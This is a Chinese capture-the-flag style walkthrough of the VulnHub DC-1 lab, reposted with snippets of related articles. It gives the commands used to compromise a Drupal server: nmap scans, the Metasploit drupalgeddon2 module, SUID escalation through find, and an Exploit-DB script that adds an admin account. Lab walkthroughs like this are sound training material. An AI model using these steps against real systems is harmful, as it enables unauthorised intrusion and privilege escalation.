靶场练习第九天~vulnhub靶场之dc-1

一、环境搭建

靶场下载链接: 百度网盘 请输入提取码 提取码: ih67

1.查看kali的ip:ifconfig

二、信息收集

1.使用namp命令

主机探测: nmap -sP 192.168.101.0/24

 查看靶机开放端口号和服务:nmap -A 192.168.101.111

发现开放80端口,访问一下192.168.101.111

Drupal简介:

Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用。

Drupal大致可以分为基本部分和附加扩展,基本部分称为核心模块,包含作为CMS运行的标准程序,还可以根据要构建的网站随时添加必要的功能,是一个扩展模块,同时也是一个额外的扩展,具有一定的灵活性,因为它可以从各种功能中进行选择或组合使用。简单说就是附带了cms的php开发框架

2.使用msfconsole框架,看看有没有能够利用的脚本

在kali输入msfconsole,进入msf框架

 查看一下Drupal网站有什么可以利用的脚本:search drupal

使用第二个脚本: use exploit/unix/webapp/drupal_drupalgeddon2

查看要设置的参数:show options

设置一下RHOST:set RHOST 192.168.101.111

设置完参数直接,run执行一下攻击

三、提权

1.得到一个低权限用户

使用shell,进入到后台,并且用whoami查看当前用户

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

2.SUID提权

(1)查看具有的SUID的二进制可执行文件:find / -user root -perm -4000 -print 2>/dev/null

(2)已知的可用来提权的linux可行性文件列表如下:nmap、vim、find、bash、more、less、nano、cp

(3)利用find获得root权限shell:find / -name cron.php -exec "/bin/sh" \ ;

如上图所示已经拿到该靶机root用户权限,寻找flag文件:find / -name "*flag*.txt"

 分别cat /home/flag4/flag4.txt 、/var/www/flag1.txt、/root/thefinlflag.txt

3.拿到Drupal管理员权限

drupal使用CVE2014-3704添加管理员账号

CVE2014-3704脚本下载链接:Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit,使用的版本drupal:7.0-7.31

调用刚才下载好的脚本:Python 34992.py

调用脚本并且设置对象和登录到用户密码python 34992.py -t http://192.168.101.111 -u 1234 -p 1234

 进入最后给的那个地址,用自己创建的用户密码登录到网站后台

发现flag3

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375057.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

4~20mA模拟输出(电流环)应用笔记(转)

4~20mA模拟输出&#xff08;电流环&#xff09;应用笔记 bpesun163.com 前言 4-20mA.DC(1-5V.DC)信号制是国际电工委员会(IEC):过程控制系统用模拟信号标准。 在工业现场&#xff0c;如果采集的信号经调理后是电压信号并且进行长线传输&#xff0c;会产生以下问题&#xff1a; …

ADO多线程数据库查询

ADO多线程数据库查询通常会出现3个问题&#xff1a;1、CoInitialize 没有调用 &#xff08;CoInitialize was not called&#xff09;&#xff1b;所以&#xff0c;在使用任何dbGo对象前&#xff0c;必须手 调用CoInitialize和CoUninitialize。调用CoInitialize失败会产生"…

PHPExcel

excel文档处理对象主要用来管理我们的excel文档&#xff0c;怎么来管理&#xff08;通过属性和方法来管理&#xff09;&#xff1f;大家知道&#xff0c;类主要是由属性和方法来组成&#xff0c;通过php程序的手段来管理excel文档&#xff0c;其实就是通过本对象的属性和方法来…

靶场练习第十天~vulnhub靶场之dc-2

一、准备工作 靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;使用nmap 192.168.101.0/24&#xff0c;发现靶机地址为192.168.101.115 &#xff08;2&#xff09;对靶机做进一步探测&#xff0c;发现靶机开…

Ubuntu 14.10 创建虚拟网卡实现桥接网络

目标需求&#xff1a;在Ubuntu主机创建一张虚拟网卡&#xff0c;使得搭建在VirtualBox中的其他主机能借助虚拟网卡构建的局域网进行相互间的通讯 步骤一&#xff1a;准备工具包 安装 uml-utilities 以及 bridge-utils sudo apt-get install uml-utilities bridge-utils 步骤二&…

iOS定时器-- NSTimer 和CADisplaylink

iOS定时器-- NSTimer 和CADisplaylink 一、iOS中有两种不同的定时器&#xff1a; 1. NSTimer&#xff08;时间间隔可以任意设定&#xff0c;最小0.1ms&#xff09;// If seconds is less than or equal to 0.0, this method chooses the nonnegative value of 0.1 millisecond…

靶场练习第十一天~vulnhub靶场之dc-3

一、准备工作 1.靶场链接: 百度网盘 请输入提取码 提取码: 48d3 2.启动靶场后会遇到如下情况&#xff1a; 2-1具体解决办法如下&#xff1a; 启动成功 3.查看kali的ip&#xff1a;ifconfig 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;寻找靶机的ip&#xf…

UNIX环境高级编程一书中apue.h找不到

apue.h是作者为了方便自己写的一个库&#xff0c;在http://www.apuebook.com选择你对应书中的source code&#xff0c;然后解压压缩包中在/include/apue.h以及/lib/error.c复制到你文件系统中/usr/include中即可。另外在apue.h中#include "error.c"即可。这样gcc编译…

大龄程序员怎样渡过中年危机?(转)

大龄程序员怎样渡过中年危机&#xff1f; 作者前言&#xff1a; 话说再有十几天就进入2016年了&#xff0c;想到这&#xff0c;我不由得五味杂陈。2016年对我来说是一个特殊的年份&#xff0c;因为我即将40岁了&#xff0c;人生正式告别青年期&#xff0c;进入中年了。 在娱乐圈…

靶场练习第十二天~vulnhub靶场之dc-4

一、准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;主机发现 命令&#xff1a;nmap 192.168.101.0/24 &#xff08;2&#xff09;扫描靶机详细信息 发现主机 192…

网络命令-nc(二)

继续Netcat 这个命令吧 1&#xff1a;远程拷贝文件 在本地输出 文件debian.img 到 192.168.5.40 主机12345端口监听 nc -v 192.168.5.40 12345 < debian.img 在192.168.5.40 主机12345端口监听&#xff0c;将文件指定为debian-copy.img nc -l -v 12345 > debian-copy.im…

靶场练习第十三天~vulnhub靶场之dc-5

一、准备工作 1.靶机环境搭建 下载链接: https://pan.baidu.com/s/1csvuJ_NVCBvVr75KhxyM3Q?pwdxie7 提取码: xie7 2.kali的ip 命令&#xff1a;ifconfig 3.kali和靶机的都设置为NAT模式 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;寻找靶机的ip 命令&…

Ubuntu中输入输出重定向及管道技术简述

输出 1、标准输出 定义&#xff1a;程序在默认情况下输出结果的地方&#xff08;stdout&#xff09;。 2、输出重定向 定义&#xff1a;用于把数据的输出转移到另一个地方去。 3、Ubuntu中例子 $ls > ~/ls_out ##不显示在显示器上而是输入到文件ls_out中 uname -r > ls_…

activex打包

http://www.cnblogs.com/weiwin/p/4493835.html activeX 打包 原文 http://www.docin.com/p-409284488.html CAB打包文档说明 文档目的本文档的目的在于说明将ocx和dll以及相关的文件打包成一个CAB包&#xff0c;以便在网页下调用ocx控件时免去手工将dll和其他一下文件拷贝到客…

靶场练习第十四天~vulnhub靶场之dc-6

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接: 百度网盘 请输入提取码 提取码: bazx 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip 命令&#xff1a;sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#…

最短路径Dijkstra算法和Floyd算法整理、

转载自&#xff1a;http://www.cnblogs.com/biyeymyhjob/archive/2012/07/31/2615833.html 最短路径—Dijkstra算法和Floyd算法 Dijkstra算法 1.定义概览 Dijkstra(迪杰斯特拉)算法是典型的单源最短路径算法&#xff0c;用于计算一个节点到其他所有节点的最短路径。主要特点是以…

Java Script 中 ==(Equal) 和 === (Identity Equal) 的区别和比较算法逻辑

判断两个变量是否相等在任何编程语言中都是非常重要的功能。 JavaScript 提供了 和 两种判断两个变量是否相等的运算符&#xff0c;但我们开始学习的时候 JavaScript 的时候&#xff0c;就被一遍又一遍的告知&#xff1a; 要求变量的类型和值均相等&#xff0c;才能返回true…

靶场练习第十五天~vulnhub靶场之dc-7

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&…

ubuntu系统下如何修改host

Ubuntu系统的Hosts只需修改/etc/hosts文件&#xff0c;在目录中还有一个hosts.conf文件&#xff0c;刚开始还以为只需要修改这个就可以了&#xff0c;结果发现是需要修改hosts。修改完之后要重启网络。具体过程如下&#xff1a;1、修改hostssudo gedit /etc/hosts2、添加解析记…

Matplotlib不显示图形

安装好了Matplotlib&#xff0c;使用官方一个例子测试运行时&#xff0c;发现使用画图功能时&#xff0c;运行脚本老是显示不出图像&#xff0c;Google了一下&#xff0c;后来发现是matplotlibrc文件没配置好。 参考了官方文档&#xff0c;修改步骤如下 1.查找matplotlibrc文件…